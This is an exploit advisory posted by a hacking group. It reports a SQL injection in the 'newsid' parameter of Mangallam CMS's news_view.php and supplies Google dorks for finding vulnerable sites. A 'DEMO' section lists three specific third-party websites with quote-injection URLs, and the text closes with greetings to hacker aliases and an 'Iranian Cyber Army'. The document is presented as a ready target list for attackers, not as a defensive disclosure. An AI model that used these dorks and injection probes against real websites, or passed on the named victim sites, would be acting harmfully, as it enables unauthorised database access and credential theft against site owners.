[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]                                                                                      
[+]Exploit Title    : Mangallam CMS Sql Injection Vulnerability                         
[+]                                                                                         
[+]Exploit Author   : Ashiyane Digital Security Team                                           
[+]                                                                                          
[+]Vendor Homepage  : http://www.jnvustudents.com/                                        
[+]                                                                                       
[+]Google Dork ONE  : intext:powered by : Mangallam
[+]    
[+]Google Dork Two  : inurl:/news_view.php?newsid= intext:Powered by : Mangallam  
[+]                                                                                     
[+]Date             : 21 / jan / 2015                                                                  
[+]                                                                                     
[+]Tested On        : windows se7en + linux Kali + Google Chrome + Mozilla + Pentest App                                               
[+]                                                                                        
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>DESCRITION   <~ ~ ~ 
[+] 
[+] Mangallam CMS suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
[+] Mangallam CMS SQL injection vulnerabilities has been found and confirmed within the software as an anonymous user.
[+] A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database.
[+] The following URLs and parameters have been confirmed to suffer from SQL injection.                                                                                        
[+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>  Location   <~ ~ ~                           
[+] SQL ERROR Location                                                                                        
[+] http://www.site.com/news_view.php?newsid=[SQL]                                              
[+] 
[+]~ ~ ~~ ~ ~~  ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~ ~~ ~>   DEMO      <~ ~ ~                       
[+]
[+]
[+] ERROR : http://www.readersshelf.com/news_view.php?newsid=90%27
[+]
[+] ERROR : http://www.hindpoultry.com/news_view.php?newsid=5%27
[+]
[+] ERROR : http://www.vibrantschool.com/news_view.php?newsid=3%27
[+] 
[+] And Google More . . . \ .
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] MY Teacher : [+] SeRaVo.BlackHaT [+] + Unhex.coder + #N3T + Lupin 13 + AMOK + Milad.Hacking 
[+] Mr.Time + SHD.N3T + MR.M@j!D + eb051 + RAMIN + ACC3SS + X3UR + 4li.BlackHat + 3cure BlackHat
[+] Dj.TiniVini + NoL1m1t + l4tr0d3ctism + r3d_s0urc3 + 0x0ptim0us + E1.Coders + Dr.3vil
[+] 0xTiger + C4T + Predator + Xodiak + soheil.hidd3n + Soldier + Spoofer + Cyb3r_Dr4in
[+] Net.editor + M3QDAD + M.R.S.CO + Hesam King + Evil Shadow + 3H34N + G3N3Rall + Mr.XHat
[+] 
[+] And All Iranian Cyber Army ...\.
[+]                                                      Home : Ashiyane.org/Forum
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]